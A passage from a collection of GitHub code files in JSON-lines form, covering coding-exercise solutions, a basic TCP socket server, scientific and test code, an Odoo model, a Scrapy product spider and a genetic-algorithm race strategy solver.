range(2,len(binval)):\n if binval[i]=='1':\n positions.append(i)\n diff=0\n if len(positions)==1:\n return 0\n else:\n for i in range(len(positions)-1):\n tempdiff=abs(positions[i]-positions[i+1])\n if tempdiff>diff:\n diff=tempdiff\n return diff\n \n","repo_name":"AmitBaanerjee/Data-Structures-Algo-Practise","sub_path":"leetcode problems/868.py","file_name":"868.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17237431825","text":"import socket\n\nPORT = 9090\n\n## automatically gets private ip addy dynamically\n# only works when not using a virtual box\n# host = socket.gethostbyname(socket.gethostname())\nHOST = ''\n\n# specify the type of socket - TCP - Socket for accepting connection\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# passing a tuple of host and port \nserver.bind((HOST, PORT))\n\nserver.listen(5) # number of acceptable connections\n\nwhile True:\n # comms socket \n # returns the addy of the client who is connecting and a socket that we can use to talk to client\n communication_socket, address = server.accept()\n print(f\"Connected to {address}\")\n # specify buffer size and decode for accepting - ascii can be use\n message = communication_socket.recv(1024).decode('utf-8')\n print(f\"Message from client is: {message}\")\n communication_socket.send(f\"This is server, I can hear you LAC!\".encode('utf-8'))\n communication_socket.close()\n print(f\"Connection with {address} ended!\")","repo_name":"veronicapichay/Networking-in-Python","sub_path":"python_sockets/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39426437612","text":"# # Finding the unloaded geometry\n#\n\nfrom fenics_plotly import plot\n\nimport pulse\n\n\ngeometry = pulse.HeartGeometry.from_file(pulse.mesh_paths[\"simple_ellipsoid\"])\n# geometry = pulse.geometries.prolate_ellipsoid_geometry(mesh_size_factor=3.0)\nmaterial = pulse.NeoHookean()\n# material = pulse.Guccione()\n\n# Parameter for the cardiac boundary conditions\nbcs_parameters = pulse.MechanicsProblem.default_bcs_parameters()\nbcs_parameters[\"base_spring\"] = 1.0\nbcs_parameters[\"base_bc\"] = \"fix_x\"\n\n# Create the problem\nproblem = pulse.MechanicsProblem(geometry, material, bcs_parameters=bcs_parameters)\n\n# Suppose geometry is loaded with a pressure of 1 kPa\n# and create the unloader\nunloader = pulse.FixedPointUnloader(problem=problem, pressure=3.0)\n\n# Unload the geometry\nunloader.unload()\n\n# Get the unloaded geometry\nunloaded_geometry = unloader.unloaded_geometry\n\nfig = plot(geometry.mesh, opacity=0.0, show=False)\nfig.add_plot(plot(unloaded_geometry.mesh, color=\"red\", show=False))\nfig.show()\n","repo_name":"finsberg/pulse","sub_path":"demo/unloading/demo_fixedpointunloader.py","file_name":"demo_fixedpointunloader.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"32"} +{"seq_id":"23466167178","text":"#https://www.hackerrank.com/challenges/compare-the-triplets\n\nimport sys\n\ndef solve(a0, a1, a2, b0, b1, b2):\n aliceScore = 0\n bobScore = 0\n\n if a0 > b0:\n aliceScore += 1\n elif a0 < b0:\n bobScore += 1\n if a1 > b1:\n aliceScore += 1\n elif a1 < b1:\n bobScore += 1\n if a2 > b2:\n aliceScore += 1\n elif a2 < b2:\n bobScore += 1\n\n return str(aliceScore) + str(bobScore)\n\n\na0, a1, a2 = input().strip().split(' ')\na0, a1, a2 = [int(a0), int(a1), int(a2)]\nb0, b1, b2 = input().strip().split(' ')\nb0, b1, b2 = [int(b0), int(b1), int(b2)]\nresult = solve(a0, a1, a2, b0, b1, b2)\nprint (\" \".join(map(str, result)))","repo_name":"14gollaher/Katas","sub_path":"Katas/Python/CompareTheTriplets.py","file_name":"CompareTheTriplets.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20338983088","text":"\"\"\"Tests relating to initial henry constant.\n\nAll functions in /calculations/initial_henry.py are tested here.\nThe purposes are:\n\n - testing the user-facing API functions (initial_henry_x)\n - testing individual low level functions against known results.\n\nFunctions are tested against pre-calculated values on real isotherms.\nAll pre-calculated data for characterisation can be found in the\n/.conftest file together with the other isotherm parameters.\n\"\"\"\n\nimport pytest\nfrom numpy import isclose\n\nimport pygaps.characterisation.initial_henry as ih\nimport pygaps.parsing as pgp\nimport pygaps.utilities.exceptions as pgEx\n\nfrom ..test_utils import mpl_cleanup\nfrom .conftest import DATA\nfrom .conftest import DATA_N77_PATH\n\n\n@pytest.mark.characterisation\nclass TestInitialHenry():\n \"\"\"Test all initial henry methods.\"\"\"\n @pytest.mark.parametrize('sample', [sample for sample in DATA])\n def test_ihenry_slope(self, sample):\n \"\"\"Test initial slope method with several model isotherms.\"\"\"\n sample = DATA[sample]\n # exclude datasets where it is not applicable\n if sample.get('Khi_slope', None):\n\n filepath = DATA_N77_PATH / sample['file']\n isotherm = pgp.isotherm_from_json(filepath)\n\n ihenry_slope = ih.initial_henry_slope(isotherm, max_adjrms=0.01)\n\n err_relative = 0.1 # 10 percent\n err_absolute = 10 #\n\n assert isclose(ihenry_slope, sample['Khi_slope'], err_relative, err_absolute)\n\n def test_ihenry_slope_limits(self):\n \"\"\"Test introducing limits in the initial slope method.\"\"\"\n sample = DATA['SiO2']\n filepath = DATA_N77_PATH / sample['file']\n isotherm = pgp.isotherm_from_json(filepath)\n ih.initial_henry_slope(isotherm, max_adjrms=0.01, p_limits=[0, 0.2])\n ih.initial_henry_slope(isotherm, max_adjrms=0.01, p_limits=[0.2, None])\n ih.initial_henry_slope(isotherm, max_adjrms=0.01, l_limits=[5, None])\n\n with pytest.raises(pgEx.ParameterError):\n ih.initial_henry_slope(isotherm, max_adjrms=0.01, l_limits=[25, None])\n\n @mpl_cleanup\n def test_ihenry_slope_verbose(self):\n \"\"\"Test verbosity.\"\"\"\n sample = DATA['MCM-41']\n filepath = DATA_N77_PATH / sample['file']\n isotherm = pgp.isotherm_from_json(filepath)\n ih.initial_henry_slope(isotherm, verbose=True)\n\n @pytest.mark.parametrize('sample', [sample for sample in DATA])\n def test_ihenry_virial(self, sample):\n \"\"\"Test virial method with several model isotherms.\"\"\"\n sample = DATA[sample]\n # exclude datasets where it is not applicable\n if sample.get('Khi_slope', None):\n\n filepath = DATA_N77_PATH / sample['file']\n isotherm = pgp.isotherm_from_json(filepath)\n\n ihenry_virial = ih.initial_henry_virial(isotherm)\n\n err_relative = 0.1 # 10 percent\n err_absolute = 10 #\n\n assert isclose(ihenry_virial, sample['Khi_virial'], err_relative, err_absolute)\n\n @mpl_cleanup\n def test_ihenry_virial_verbose(self):\n \"\"\"Test verbosity.\"\"\"\n sample = DATA['SiO2']\n filepath = DATA_N77_PATH / sample['file']\n isotherm = pgp.isotherm_from_json(filepath)\n ih.initial_henry_virial(isotherm, verbose=True)\n","repo_name":"pauliacomi/pyGAPS","sub_path":"tests/characterisation/test_initial_henry.py","file_name":"test_initial_henry.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"32"} +{"seq_id":"30578320043","text":"def deleteSpaces(s):\n s_new = s.replace(\" \",\"\",)\n return s_new\n\ndef check(s1,s2):\n if sorted(deleteSpaces(s1).lower()) == sorted(deleteSpaces(s2).lower()):\n print(\"Anagram\")\n else:\n print(\"Not Anagram\")\n\ns1 = input(\"Enter the first word: \")\ns2 = input(\"Enter the second word: \")\n\ncheck(s1,s2)\n","repo_name":"TarampikosAndreas/Python-Exercises","sub_path":"Anagram-Checker/anagram4.py","file_name":"anagram4.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10205365818","text":"import codecs\nimport jieba\nimport re\n\nwith codecs.open(\"./dict/stopwords.txt\", encoding='utf-8') as stopword_file:\n stop_words = stopword_file.read().splitlines()\n\ndef tokenize(sentence):\n sentence = sentence.lower()\n # replace space into signle space \n sentence = re.sub(r\"\\s+\", ' ', sentence)\n tokens = jieba.lcut(sentence)\n tokens = [ token for token in tokens if token not in stop_words ]\n return tokens","repo_name":"kenyipp/chatbot-maker","sub_path":"nlpEngine/src/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"37813104813","text":"import cv2\nimport numpy as np\nfrom scipy import ndimage\nimport os\n\n# https://docs.opencv.org/3.4.1/d7/d4d/tutorial_py_thresholding.html\nth = 127\nmax_val = 255\n# for color do not forget to convert BGR to RBG\n\n\nimport cv2\n\ncameraCapture = cv2.VideoCapture(0)\n\n\nfps = 30\nsize = (int(cameraCapture.get(cv2.CAP_PROP_FRAME_WIDTH)),\n int(cameraCapture.get(cv2.CAP_PROP_FRAME_HEIGHT)))\n\n\nwhile cameraCapture.isOpened():\n _, frame = cameraCapture.read()\n ret, o1 = cv2.threshold(frame, th, max_val, cv2.THRESH_BINARY) # 0 or max_value\n ret, o2 = cv2.threshold(frame, th, max_val, cv2.THRESH_BINARY_INV)\n ret, o3 = cv2.threshold(frame, th, max_val, cv2.THRESH_TOZERO) # keep as it is none concern pixel\n ret, o4 = cv2.threshold(frame, th, max_val, cv2.THRESH_TOZERO_INV)\n ret, o5 = cv2.threshold(frame, th, max_val, cv2.THRESH_TRUNC) # all pixel > threshhold => threshold\n\n cv2.imshow('MyWindow',\tframe)\n cv2.imshow(\"binary\", o1)\n cv2.imshow(\"binary_inv\", o2)\n cv2.imshow(\"tozero\", o3)\n cv2.imshow(\"tozero_inv\", o4)\n cv2.imshow(\"trunc\", o5)\n\n if cv2.waitKey(1) == 27:\n\n break # esc to quit\n\ncameraCapture.release()\ncv2.destroyAllWindows()","repo_name":"Tenjin0/python-opencv-base","sub_path":"introduction/13_camera_thresholding.py","file_name":"13_camera_thresholding.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"261657075","text":"\n\"\"\"\nPrint every number between 1 and 100 as follows: For every multiple of 3 print \"Three\".\n For every multiple of 5 print \"Five\".\n And for every multiple of both 3 and 5 print \"ThreeFive\"\nreturn : None\n\n\"\"\"\ndef exercise_one():\n for i in range(1, 101):\n if i % 3 == 0 and i % 5 == 0:\n print(\"ThreeFive\")\n elif i % 3 == 0:\n print(\"Three\")\n elif i % 5 == 0:\n print(\"Five\")\n else:\n print(i)\n return None\n\n\"\"\"\nDetermine whether a positive integer number is colorful or not.\nparam n:(int) a positive number \nreturn :(bool) if the number is colorful and if not.\n\"\"\"\n\ndef is_colorful(n):\n # Convert the integer to a string to obtain its digits\n digits = str(n)\n # Create an empty set to store the products\n products = set()\n # Iterate through the digits and subsets of digits\n for i in range(len(digits)):\n for j in range(i, len(digits)):\n subset = [int(d) for d in digits[i:j+1]]\n product = 1\n # Compute the product of the subset\n for num in subset:\n product *= num\n # Check if the product is already in the set\n if product in products:\n return False\n products.add(product)\n return True\n\n\"\"\"\n\nTakes a list of strings a returns the sum of the list items that represents an integer (skipping the other items).\nparam lst:(String) a list of strings.\nreturn :(int or Bool) the result of the calculation.\n\n\"\"\"\ndef calculate(lst):\n if type(lst) != list:\n return False\n total = 0\n for item in lst:\n if type(item) != str:\n pass\n else:\n try:\n num = int(item)\n total += num\n except ValueError:\n # item is not digit\n pass\n return total\n\n\n\n\n\"\"\"\nFinds all the anagrams of a word from a list.\nparam word:(String) a word that we searching anagrams for.\nparam word_list:(List(String)) the list of the words that can potentially be anagrams.\nreturn :(List(String)) the list of the anagrams of the word (it can be empty).\n\"\"\"\ndef anagrams(word, word_list):\n result = list()\n for w in word_list:\n if sorted(w) == sorted(word):\n result.append(w)\n return result\n\n\n","repo_name":"yvss2359/PythonExercices","sub_path":"first_part/src.py","file_name":"src.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12927244923","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom odoo import api, fields, models\r\n\r\n\r\nclass DeliveryRound(models.Model):\r\n\r\n _name = \"delivery.round\"\r\n\r\n name = fields.Char(string=\"Name\", required=True, default=\"/\")\r\n deliverer = fields.Many2one('res.users', string=\"Deliverer\")\r\n responsible = fields.Many2one('res.users', string=\"Responsible\")\r\n time_frame_id = fields.Many2one(\r\n 'time.frame',\r\n string='Time frame',\r\n required=True)\r\n delivery_date = fields.Date(related='time_frame_id.delivery_date',\r\n store=True)\r\n lines = fields.One2many('delivery.round.line', 'delivery_round',\r\n string='Delivery line')\r\n state = fields.Selection([('draft', 'Draft'),\r\n ('ready', 'Ready'),\r\n ('done', 'Done')],\r\n string=\"State\", default=\"draft\")\r\n\r\n @api.one\r\n def action_ready(self):\r\n self.write({'state': 'ready'})\r\n\r\n @api.one\r\n def action_done(self):\r\n self.write({'state': 'done'})\r\n\r\n\r\nclass DeliveryRoundLine(models.Model):\r\n\r\n _name = \"delivery.round.line\"\r\n\r\n sequence = fields.Integer(string=\"Sequence\")\r\n delivered = fields.Boolean(string=\"Delivered\")\r\n picking_batch = fields.Many2one('stock.picking.batch',\r\n string=\"Picking batch\")\r\n delivery_round = fields.Many2one('delivery.round', string=\"Delivery round\",\r\n required=True)\r\n raliment_point = fields.Many2one('res.partner',\r\n string=\"R'Aliment point\")\r\n delivery_address = fields.Many2one(\r\n 'res.partner',\r\n string=\"Delivery address\",\r\n domain=[('is_delivery_point', '=', True)])\r\n stock_pickings = fields.One2many(related='picking_batch.picking_ids',\r\n string=\"Stock pickings\")\r\n order_quantity = fields.Integer(string=\"Order quantity\",\r\n compute=\"_compute_order_quantity\",\r\n store=True)\r\n\r\n @api.depends('stock_pickings')\r\n @api.multi\r\n def _compute_order_quantity(self):\r\n for line in self:\r\n line.order_quantity = len(line.stock_pickings)\r\n","repo_name":"coopiteasy/vertical-distribution-circuits","sub_path":"distribution_circuits_logistic/models/delivery_round.py","file_name":"delivery_round.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"20540528737","text":"from scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request\nfrom scrapy.utils.response import get_base_url\nfrom scrapy.contrib.loader.processor import Compose\nfrom urlparse import urljoin\nfrom product_spiders.items import Product, ProductLoader\nimport urllib2\nimport re\n\nfrom product_spiders.spiders.lego_cz.legobase import LegoMetadataBaseSpider\n\n\nclass BejbySpider(LegoMetadataBaseSpider):\n name = u'bejby.net'\n allowed_domains = ['www.bejbynet.cz']\n start_urls = [\n u'http://www.bejbynet.cz/lego-4?page=1',\n u'http://www.bejbynet.cz/lego-nahradni-dily?page=1',\n ]\n errors = []\n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n base_url = get_base_url(response)\n\n items = hxs.select('//div[@id=\"products\"]//h2/a/@href').extract()\n for url in items:\n yield Request(urljoin(base_url, url), callback=self.parse_product)\n if items:\n url = urllib2.urlparse.urlparse(base_url)\n new_url = url.scheme + \"://\" + url.netloc + url.path + \"?page=%d\" % (response.meta.get(\"n\", 1) + 1)\n yield Request(new_url, callback=self.parse, meta={\"n\": response.meta.get(\"n\", 1) + 1})\n\n def parse_price(self, price):\n try:\n price, count = re.subn(r'[^0-9 .,]*([0-9 .,]+)\\W*K.*', r'\\1', price.strip())\n except TypeError:\n return False\n if count:\n price = price.replace(\",\", \"\").replace(\" \", \"\")\n try:\n price = float(price)\n except ValueError:\n return False\n else:\n return price\n elif price.isdigit():\n return float(price)\n return False\n\n def get_sku_from_text(self, text):\n try:\n id, count = re.subn(r'[^0-9]*([0-9]{4,6}).*', r'\\1', text)\n except TypeError:\n return \"\"\n if count:\n id = id.strip()\n try:\n int(id)\n except ValueError:\n return \"\"\n else:\n return id\n return False\n\n def parse_product(self, response):\n\n hxs = HtmlXPathSelector(response)\n base_url = get_base_url(response)\n\n name = hxs.select('//h1[@id=\"title\"]/text()').pop().extract().strip()\n\n category = hxs.select('//ul[@id=\"breadcrumbs\"]/li/a/text()')[-1].extract().strip()\n\n sku = self.get_sku_from_text(name)\n\n pid = hxs.select('//div[@id=\"product-description\"]//input[@name=\"product\"]/@value').extract()[0]\n if not sku:\n sku = pid\n\n price = self.parse_price(\"\".join(hxs.select('//span[contains(@class, \"final-price\")]/span/span[@class=\"price\"]/text()').extract()))\n\n stock = hxs.select('//div[contains(@class, \"product-prices\")]//div[contains(@class, \"availability\")]/div[@class=\"green\"]')\n\n if price:\n loader = ProductLoader(response=response, item=Product())\n loader.add_value('url', urljoin(base_url, response.url))\n loader.add_value('name', name)\n loader.add_xpath('image_url', '//img[@id=\"galeryImg\"]/@src')\n loader.add_value('price', price)\n loader.add_value('category', category)\n loader.add_value('sku', sku)\n loader.add_value('identifier', pid)\n loader.add_value('brand', 'LEGO')\n if int(price) < 2000:\n loader.add_value('shipping_cost', 89)\n if not stock:\n loader.add_value('stock', 0)\n yield self.load_item_with_metadata(loader.load_item())\n else:\n self.errors.append(\"No price set for url: '%s'\" % urljoin(base_url, response.url))\n","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/lego_cz/bejbynet.py","file_name":"bejbynet.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19010607374","text":"import os\r\nimport copy\r\nimport math \r\nimport time\r\nimport logging\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nfrom tqdm import tqdm\r\nfrom random import SystemRandom\r\n\r\nfrom classes.Car import Car\r\nfrom classes.Weather import Weather\r\nfrom classes.Utils import CIRCUIT, Log, ms_to_time, get_basic_logger\r\n\r\nrandom = SystemRandom()\r\nlogger = get_basic_logger('Genetic', logging.INFO)\r\n\r\nTYRE_WEAR_THRESHOLD = 0.3\r\nBEST_TIME = np.inf\r\nSTRATEGY = None\r\n\r\ndef boxplot_insert(data_list:list, population:list):\r\n population = sorted(population, key=lambda x: x['TotalTime'])\r\n\r\n fitnesses = list()\r\n\r\n for strategy in population:\r\n timing = strategy['TotalTime']\r\n if strategy['Valid'] and timing > 0:\r\n fitnesses.append(strategy['TotalTime'])\r\n else:\r\n fitnesses.append(np.nan)\r\n \r\n data_list.append(fitnesses)\r\n return data_list\r\n\r\ndef orderOfMagnitude(number):\r\n order = 0\r\n if number < 1 and number > 0:\r\n while number<1.0:\r\n order-=1\r\n number*=10\r\n elif number > 0:\r\n while number>1.0:\r\n order+=1\r\n number/=10\r\n\r\n return order\r\n\r\ndef overLimit(values, limit):\r\n if not isinstance(values, list):\r\n values = list(values)\r\n for val in values:\r\n if val >= limit:\r\n return True\r\n \r\n return False\r\n\r\ndef changeTyre(tyresWear:dict):\r\n if all([x < TYRE_WEAR_THRESHOLD for x in tyresWear.values()]):\r\n return False\r\n\r\n boundary = random.random()\r\n for wear in tyresWear.values():\r\n if boundary < wear*2:\r\n return True\r\n return False\r\n\r\nclass GeneticSolver:\r\n\r\n def __init__(self, population:int=2, mutation_pr:float=0.75, crossover_pr:float=0.5, iterations:int=1, car:Car=None, circuit:str='', weather:str='', save_path:str='') -> None:\r\n self.circuit = circuit\r\n self.pitStopTime = CIRCUIT[circuit]['PitStopTime']\r\n self.availableTyres:dict = dict()\r\n self.sigma = mutation_pr\r\n self.mu = crossover_pr\r\n self.population = population\r\n self.numLaps = CIRCUIT[circuit]['Laps']\r\n self.iterations = iterations\r\n self.car:Car = car\r\n self.weather = Weather(circuit) if weather == '' else Weather(circuit, weather)\r\n\r\n ### For the log file\r\n self.path = save_path\r\n self.log = Log(save_path, values={'Circuit':circuit, 'Weather': self.weather.filename, 'PitStopTime':self.pitStopTime, 'Mutation': mutation_pr, 'Crossover': crossover_pr, 'Population': population, 'Iterations':iterations})\r\n \r\n self.mu_decay = 0.99\r\n self.sigma_decay = 0.99\r\n \r\n\r\n # Function to run the algorithm\r\n def run(self,bf_time:int=0):\r\n start_timer = time.time()\r\n\r\n fitness_values = dict()\r\n stuck_counter = 0\r\n boxplot_list = list()\r\n prev = {}\r\n\r\n ### Initial population of random bitstring\r\n population = self.initSolver()\r\n\r\n print(f\"\\n-------------------------------------------------------------\\nData for '{self.circuit}':\\n\\nPopulation = {self.population}\\nIterations = {self.iterations}\\nMutation = {self.sigma}\\nCrossover = {self.mu}\\nWeather = {self.weather.filename}\\n-------------------------------------------------------------\\n\")\r\n \r\n ### Enumerate generations\r\n try:\r\n bar = tqdm(range(self.iterations))\r\n for gen in bar:\r\n \r\n ### Checking if there are duplicates, if so, we remove them\r\n to_pop = []\r\n for i in range(0, len(population)-1):\r\n for j in range(i+1, len(population)):\r\n if population[i] == population[j] and j not in to_pop:\r\n to_pop.append(j)\r\n\r\n ### Removing duplicates by sorted indexes would return an error (we are changing length of the list) so we remove them in reversed order\r\n to_pop = sorted(to_pop, reverse=True)\r\n for i in to_pop:\r\n population.pop(i)\r\n \r\n ### Gathering the first solution from population at gen^th generation\r\n if gen == 0:\r\n best, best_eval = self.getBest(population)\r\n else:\r\n best, best_eval = self.getBest(population, best)\r\n\r\n ### Storing data for boxplot\r\n boxplot_list = boxplot_insert(boxplot_list, population)\r\n\r\n ### Select parents\r\n selected = self.selection_dynamic_penalty(step=gen+1,population=population,threshold_quantile=2/13, best = best_eval)\r\n \r\n ### Set as parents the selected individuals\r\n parents = copy.deepcopy(selected)\r\n \r\n ### Make a copy of the parents as new children\r\n children = copy.deepcopy(parents)\r\n\r\n ### Crossover and mutation steps\r\n for i in range(0, len(parents)-1, 2): \r\n p1, p2 = copy.deepcopy(parents[i]), copy.deepcopy(parents[i+1])\r\n\r\n for c in self.crossover(p1, p2):\r\n children.append(c)\r\n \r\n for l in self.mutation(parents[i]):\r\n children.append(l)\r\n \r\n for l in self.mutation(parents[i+1]):\r\n children.append(l)\r\n\r\n ### Add random children to the population if the population is not full\r\n for _ in range(self.population-len(children)):\r\n children.append(self.randomChild())\r\n \r\n ### Replace old population\r\n population = copy.deepcopy(children)\r\n\r\n if prev == best_eval:\r\n stuck_counter += 1\r\n else:\r\n ### Check for new best solution\r\n if not math.isinf(best_eval):\r\n fitness_values[gen] = best_eval\r\n stuck_counter = 0\r\n \r\n prev = best_eval\r\n\r\n ### Check if the solution is stucked\r\n if stuck_counter == 0:\r\n threshold_quantile = 0.3\r\n\r\n if stuck_counter >= (self.iterations)//100:\r\n stuck_counter = 0\r\n quarter_pop = self.population//4\r\n population = population[:self.population]\r\n idx = random.randint(1, quarter_pop)\r\n threshold_quantile = round(threshold_quantile - 0.05,2)\r\n for i in range(3*quarter_pop+idx, self.population):\r\n population[i] = self.randomChild()\r\n \r\n if threshold_quantile <= 0.01 or threshold_quantile >= 0.99:\r\n threshold_quantile = round(random.uniform(0.3,0.99),2)\r\n\r\n valid_strategies = round(((sum([1 for x in children if x['Valid'] == True]))/len(children))*100,2)\r\n bar.set_description(f\"Best: {ms_to_time(best_eval)}, Difference: {ms_to_time(best_eval-bf_time)}, Threshold: {threshold_quantile}, Stuck: {stuck_counter}, Valid strategies: {valid_strategies}%\")\r\n bar.refresh()\r\n string = f'[EA] Generation {gen+1} - Bruteforce solution: {ms_to_time(bf_time)} -> best overall: {ms_to_time(best_eval)} - difference: {ms_to_time(best_eval-bf_time)} - valid strategies: {valid_strategies}% | threshold is {threshold_quantile} - Stuck Counter = {stuck_counter}/{(self.iterations)//100}'\r\n self.log.write(string+\"\\n\")\r\n \r\n except KeyboardInterrupt:\r\n pass \r\n\r\n end_timer = time.time() - start_timer\r\n\r\n fit_dict = {'Generation' : list(fitness_values.keys()), 'Fitness' : list(fitness_values.values())}\r\n\r\n strategy_path = os.path.join(self.path, 'Strategy.txt')\r\n \r\n string = f\"Best Strategy fitness: {best_eval}\\nBest Strategy time: {ms_to_time(best_eval)}\\n\\n vs \\n\\nBruteforce fitness: {bf_time}\\nBruteforce time: {ms_to_time(bf_time)}\\n\\n\\n\"\r\n\r\n for lap in range(self.numLaps):\r\n string += f\"Lap {lap+1}: Rain {best['Weather'][lap]}% -> Compound '{best['TyreCompound'][lap]}', TyresAge {best['TyreAge'][lap]}, Wear '{round(best['TyreWear'][lap]['FL']*100,1)}'% | '{round(best['TyreWear'][lap]['FR']*100,1)}'% | '{round(best['TyreWear'][lap]['RL']*100,1)}'% | '{round(best['TyreWear'][lap]['RR']*100,1)}'%, Fuel '{round(best['FuelLoad'][lap],2)}' Kg, PitStop '{'Yes' if best['PitStop'][lap] else 'No'}', Time '{ms_to_time(best['LapTime'][lap])}' ms\\n\"\r\n \r\n with open(strategy_path, 'w') as f:\r\n f.write(string)\r\n \r\n string += f\"Time elapsed: {ms_to_time(round(end_timer*1000))}\\n\"\r\n \r\n print(\"\\n\\n\"+string)\r\n self.log.write(\"\\n\\n\"+string)\r\n\r\n boxplot_df = pd.DataFrame(index=range(len(boxplot_list)))\r\n for i in range(max([len(x) for x in boxplot_list])):\r\n for j in range(len(boxplot_list)):\r\n try:\r\n boxplot_df.at[i,j] = boxplot_list[j][i]\r\n except:\r\n pass\r\n\r\n boxplot_df.to_csv(os.path.join(self.path,'Boxplot.csv'))\r\n\r\n return best, best_eval, boxplot_df, fit_dict, end_timer\r\n \r\n\r\n # Function to initialize the population\r\n def initSolver(self,):\r\n strategies = []\r\n for _ in range(self.population):\r\n strategies.append(self.randomChild())\r\n\r\n return strategies\r\n \r\n\r\n # Function to build a random strategy\r\n def randomChild(self):\r\n strategy = {'TyreCompound': [], 'TyreAge':[], 'TyreWear':[] , 'FuelLoad':[] , 'PitStop': [], 'LapTime':[], 'NumPitStop': 0, 'Weather':self.weather.get_weather_percentage_list(), 'Valid':False, 'TotalTime': np.inf}\r\n\r\n weather = strategy['Weather'][:1]\r\n\r\n ### Get a random compound\r\n compound = self.randomCompound()\r\n strategy['TyreCompound'].append(compound)\r\n tyresAge = 0 \r\n strategy['TyreAge'].append(tyresAge)\r\n strategy['TyreWear'].append(self.getTyreWear(compound, tyresAge))\r\n\r\n ### The fuel load can be inferred by the coefficient of the fuel consumption, we add a random value between -10 and 10 to get a little variation\r\n initialFuelLoad = round(random.uniform(0,110),2)\r\n strategy['FuelLoad'].append(initialFuelLoad)\r\n\r\n ### At first lap the pit stop is not made (PitStop list means that at lap i^th the pit stop is made at the beginning of the lap)\r\n strategy['PitStop'].append(False)\r\n\r\n ### Compute lapTime\r\n strategy['LapTime'].append(self.getLapTime(compound=compound, compoundAge=tyresAge, lap=0, fuel_load=initialFuelLoad, conditions=weather, drs=False, pitStop=False))\r\n\r\n ### For every lap we repeat the whole process\r\n for lap in range(1,self.numLaps):\r\n weather = strategy['Weather'][:lap+1]\r\n\r\n ### The fuel does not depend on the compound and/or pit stops => we compute it and leave it here\r\n fuelLoad = self.getFuelLoad(initial_fuel=initialFuelLoad, conditions=weather)\r\n strategy['FuelLoad'].append(fuelLoad)\r\n\r\n newTyre = random.choice([True, False])\r\n\r\n if newTyre:\r\n compound = self.randomCompound()\r\n tyresAge = 0\r\n pitStop = True\r\n strategy['NumPitStop'] += 1\r\n else: \r\n compound = strategy['TyreCompound'][lap-1]\r\n tyresAge += 1\r\n pitStop = False\r\n \r\n \r\n strategy['TyreAge'].append(tyresAge)\r\n strategy['TyreCompound'].append(compound)\r\n strategy['TyreWear'].append(self.getTyreWear(compound, tyresAge))\r\n strategy['PitStop'].append(pitStop)\r\n strategy['LapTime'].append(self.getLapTime(compound=compound, compoundAge=tyresAge, lap=lap, fuel_load=fuelLoad, conditions=weather, drs=False, pitStop=pitStop))\r\n \r\n strategy['TotalTime'] = sum(strategy['LapTime'])\r\n return strategy\r\n \r\n\r\n # Function to get a random compound\r\n def randomCompound(self,):\r\n return random.choice(['Soft', 'Medium', 'Hard','Inter','Wet'])\r\n \r\n\r\n # Function to get the TyreWear given the compound and the lap\r\n def getTyreWear(self, compound:str, lap:int):\r\n if lap == 0:\r\n return {'FL':0.0, 'FR':0.0, 'RL':0.0, 'RR':0.0}\r\n\r\n wear = self.car.predict_tyre_wear(compound, lap)\r\n \r\n for key, val in wear.items():\r\n wear[key] = val/100\r\n \r\n return wear\r\n \r\n\r\n # Function for computing the lap time \r\n def getLapTime(self, compound:str, compoundAge:int, lap:int, fuel_load:float, conditions:list, drs:bool, pitStop:bool) -> int:\r\n conditions_int = conditions[-1]\r\n conditions_str = [self.weather.get_weather_string(c) for c in conditions[:-1]]\r\n\r\n time = self.car.predict_laptime(tyre=compound, tyre_age=compoundAge, lap=lap, start_fuel=fuel_load, conditions_str=conditions_str, conditions_int=conditions_int, drs=drs)\r\n\r\n if pitStop:\r\n time += self.pitStopTime\r\n\r\n if lap == 0:\r\n time += 2000\r\n\r\n return round(time) \r\n \r\n\r\n # Function to get the fuel load\r\n def getFuelLoad(self, initial_fuel:float, conditions:list) :\r\n weather = [self.weather.get_weather_string(c) for c in conditions[:-1]]\r\n return round(self.car.predict_fuel_weight(initial_fuel, weather), 2)\r\n \r\n\r\n # Function to get the best individual/strategy in the population\r\n def getBest(self, population:list, best={'TotalTime':np.inf}):\r\n \r\n for strategy in population:\r\n self.checkValidity(strategy)\r\n \r\n if strategy['Valid']:\r\n if strategy['TotalTime'] < best['TotalTime']:\r\n best = strategy\r\n \r\n return best, best['TotalTime']\r\n \r\n\r\n # Function for checking the validity of a strategy\r\n def checkValidity(self, strategy:dict):\r\n all_compounds = set(strategy['TyreCompound'])\r\n last_lap_fuel_load = self.getFuelLoad(strategy['FuelLoad'][0], strategy['Weather'])\r\n\r\n if any([x != 0 for x in strategy['Weather']]): 